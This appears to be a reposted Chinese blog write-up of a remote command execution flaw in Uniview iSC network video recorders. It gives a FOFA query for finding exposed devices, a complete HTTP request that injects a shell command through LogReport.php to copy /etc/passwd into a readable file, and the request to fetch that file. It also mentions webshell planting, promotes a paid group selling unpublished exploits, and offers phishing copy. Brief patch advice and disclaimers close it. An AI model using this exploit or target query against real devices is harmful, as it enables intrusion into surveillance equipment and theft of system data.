iSC网络视频录像机-远程命令执行RCE-漏洞复现

admin
admin
admin
140350
文章
117
评论
2023年12月31日21:39:45评论71 views字数 2009阅读6分41秒阅读模式

0X01 产品简介

ISC产品系列是宇视自主研发的新一代网络视频录像机,集视频管理、数据管理、ISCSI存储、音视频解码、网络交换等功能于一体的安防设备。

iSC网络视频录像机-远程命令执行RCE-漏洞复现

末尾领取资料,资源

0X02 漏洞描述

isc网络视频录像机LogReport.php存在远程命令执行漏洞,通过此漏洞攻击者可远程写入webshell木马,控制服务器,获取服务器权限。

0X03 复现环境

FOFA:body="Alarm" && body="白牌定制"

POC

GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;cat+/etc/passwd%3Echeck.txt HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=f952f704362e34231e810533d889f5fb; logintime=-; devLanguage=zh-CNUpgrade-Insecure-Requests: 1

POC-B

http://example.com/Interface/LogReport/file1.txt

iSC网络视频录像机-远程命令执行RCE-漏洞复现

然后访问路径 :


/Interface/LogReport/check.txt


GET /Interface/LogReport/check.txt HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=f952f704362e34231e810533d889f5fb; logintime=-; devLanguage=zh-CNUpgrade-Insecure-Requests: 1

iSC网络视频录像机-远程命令执行RCE-漏洞复现

0X05 修复建议

官方已经修复该漏洞,请用户关注厂商更新公告或联系厂商修复:https://cn.uniview.com/

通过防火墙等安全设备设置访问策略,设置白名单访问。

如非必要,禁止公网访问该系统。

0x06 最后

        如果师傅想获取更多网上及其他公众号未公开的一手1day/0day-POC资源欢迎加入内部VIP知识星球,详情请查看以下下链接,元旦限时优惠,还剩几张30元优惠券,用完还想低价加入的师傅可以等下次活动。

点击了解->>内部VIP知识星球福利介绍V1.2版本-元旦优惠

结尾

免责声明

获取方法


关注领取资源:

回复“app" 获取  app渗透和app抓包教程

回复“渗透字典" 获取 针对一些字典重新划分处理,收集了几个密码管理字典生成器用来扩展更多字典的仓库。

回复“书籍" 获取 网络安全相关经典书籍电子版pdf

回复“钓鱼001” 获取钓鱼文案

压缩包解压密码:HackTwo

最后必看

    本工具或文章仅面向合法授权的企业安全建设行为,如您需要测试内容的可用性,请自行搭建靶机环境,如果你学习了该文章内容需要测试请自行搭建靶机环境,勿用于非法行为。


    为避免被恶意使用,本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。


    在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。


    如您在使用本工具或阅读文章的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。本工具或文章来源于网络,若有侵权请联系作者删除,请在24小时内删除,请勿用于商业行为,自行查验是否具有后门,切勿相信软件内的广告!



原文始发于微信公众号(渗透安全HackTwo):iSC网络视频录像机-远程命令执行RCE-漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月31日21:39:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   iSC网络视频录像机-远程命令执行RCE-漏洞复现https://cn-sec.com/archives/2352889.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息